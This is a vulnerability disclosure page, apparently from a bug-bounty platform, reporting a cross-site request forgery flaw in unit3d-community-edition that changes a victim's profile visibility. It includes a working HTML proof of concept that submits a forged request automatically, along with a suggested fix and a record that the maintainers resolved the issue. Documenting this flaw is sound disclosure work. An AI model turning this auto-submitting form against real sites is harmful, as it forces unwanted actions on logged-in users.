We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Aug 4th 2021

✍️ Description

Attacker is able to change a user profile state to visible if a logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser
2.you can check your profile state changed to visible

<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="https://unit3d.site/users/UNIT3D/settings/visible">
     <input type="submit" value="Submit request" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
 </body>
</html>

💥 Impact

This vulnerability is capable of forging user to unintentional change profile state to visible.

💥 Test

Tested on Edge, firefox, chrome and safari.

💥 Fix

You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.

Occurrences

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 years ago
HDVinnie validated this vulnerability 2 years ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie marked this as fixed with commit 2ea49b 2 years ago
HDVinnie has been awarded the fix bounty
This vulnerability will not receive a CVE
web.php#L345 has been validated
to join this conversation